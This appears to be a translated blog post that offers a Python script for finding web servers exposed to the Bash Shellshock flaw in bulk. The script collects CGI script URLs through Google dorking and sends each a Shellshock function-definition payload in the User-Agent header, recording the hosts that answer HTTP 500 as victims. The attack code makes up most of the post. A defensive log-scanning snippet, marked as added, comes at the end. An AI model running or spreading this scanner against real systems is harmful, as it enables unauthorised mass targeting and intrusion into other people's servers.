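Bash Shellshock (Bash Remote Code Execution) Vulnerability: Batch Exploitation Script
The Bash remote code execution vulnerability is indeed far more powerful than Heartbleed, but its scope of impact is not very wide. That said, the end of yesterday's analysis article, "Bash Remote Code Execution Vulnerability Analysis", raised the question of exploiting this vulnerability in bulk.
The simplest method of all is to use search-engine hacking techniques. Here I use Google Hacking syntax together with the Google API to collect links. Within China, though, this needs a proxy.
The proxy in the program is my local goagent proxy, on port 8087. The idea for detecting the vulnerability is also simple: here I judge directly by the status code the server returns.
That is the whole idea. Below, as usual, is the code: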
#coding=utf-8
import requests
import json
import sys
import threading
import socket
vul_res = []

class GoogleURLProvider():
    def __init__(self,pageCount,proxies):
        self.pageCount = pageCount  # number of result pages to query
        self.keywords = r'inurl:cgi-bin filetype:sh'
        self.apiurl = ""
        self.proxies = proxies

    def getRequest(self,url):
        return requests.get(url,proxies=self.proxies,verify=False)

    def getUrls(self):
        ret_list = []
        tmp_list = []
        for x in xrange(0,self.pageCount):
            url = "{apiurl}?v=1.0&q={keywords}&rsz=8&start={pageCount}".format(apiurl=self.apiurl,keywords=self.keywords,pageCount=x)
            try:
                r = self.getRequest(url)
                results = json.loads(r.text)
                if not results:
                    continue
                infos = results['responseData']['results']
                if infos:
                    for i in infos:
                        tmp_list.append(i['url'])
            except Exception, e:
                continue
        ret_list = ret_list + tmp_list
        return ret_list

class BashRCEDetector():
    def __init__(self,urls):
        self.urls = urls

    def detector(self):
        global vul_res
        for x in self.urls:
            # run in threads
            each = EachWorker(x)
            each.start()
            each.join()

'''Thread worker class'''
class EachWorker(threading.Thread):
    def __init__(self,url):
        threading.Thread.__init__(self)
        self.url = url

    def run(self):
        global vul_res
        useragent_header = {'User-Agent':'''() { 1;}; echo 'eee'''}
        try:
            r = requests.get(self.url,headers = useragent_header,timeout=8)
            if r.status_code == 500:
                print "{url} has Bash RCE vulnerability".format(url=self.url)
                vul_res.append(self.url)
            else:
                pass
        except socket.timeout, e:
            pass
        except requests.exceptions.Timeout, e:
            pass
        except requests.exceptions.ConnectionError, e:
            pass

if __name__ == '__main__':
    print 'Powered by:Exploit QQ:739858341'
    print 'This is a program which you can use to scan the BashRCE vulnerability\nScanner working,please wait....'
    if len(sys.argv) != 2:
        print 'Usage:python BashRCEScanner <google pageCount>'
        sys.exit()
    # goagent proxy
    # change this to your own proxy to use the script
    proxies = {'http':"http://127.0.0.1:8087",'https':"http://127.0.0.1:8087"}
    url_res = []
    vul_guys = []
    urlgetter = GoogleURLProvider(int(sys.argv[1]),proxies)
    url_res = urlgetter.getUrls()
    bash_detector = BashRCEDetector(url_res)
    bash_detector.detector()
    if len(vul_res) == 0:
        print 'This group have no vulnerability'
    else:
        print 'Find %d poor host(s)' % len(vul_res)
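The defender's side of the probe this script sends, as an added example that is not part of the original post: it scans web-server access logs for requests whose Referer or User-Agent begins like a Bash function definition, and marks those answered with HTTP 500, the status this scanner counts as a hit. It assumes Apache/nginx "combined" log format; the function name, the log lines and the IP addresses are constructed for illustration.

```python
import re

# Combined log format: ip ident user [time] "request" status size "referer" "user-agent"
COMBINED = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)
# Header value that begins like a Bash function definition: "() {" (optional spaces allowed).
FUNC_PREFIX = re.compile(r'^\s*\(\s*\)\s*\{')

# Constructed sample log lines (documentation IP ranges, made-up paths and times).
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Sep/2014:10:01:02 +0800] "GET /cgi-bin/status.sh HTTP/1.1" 500 612 "-" "() { 1;}; echo \'eee"',
    '203.0.113.7 - - [26/Sep/2014:10:01:03 +0800] "GET /cgi-bin/test.sh HTTP/1.1" 200 45 "-" "() { 1;}; echo \'eee"',
    '198.51.100.20 - - [26/Sep/2014:10:02:00 +0800] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.33 - - [26/Sep/2014:10:03:10 +0800] "GET /cgi-bin/env.sh HTTP/1.1" 404 209 "() { ignored; }; true" "curl/7.38.0"',
]

def find_shellshock_probes(lines):
    """Return one finding per request whose Referer or User-Agent starts with '() {'."""
    findings = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        hits = [h for h in ("referer", "agent") if FUNC_PREFIX.match(m.group(h))]
        if not hits:
            continue
        findings.append({
            "ip": m.group("ip"),
            "path": m.group("path"),
            "status": int(m.group("status")),
            "headers": hits,
            # The scanner on this page records HTTP 500 as "vulnerable",
            # so probed hosts that answered 500 are triaged first.
            "priority": m.group("status") == "500",
        })
    return findings

if __name__ == "__main__":
    for finding in find_shellshock_probes(SAMPLE_LOG):
        print(finding)
```

Combined logs record only Referer and User-Agent, so a probe carried in any other header will not show up in this check.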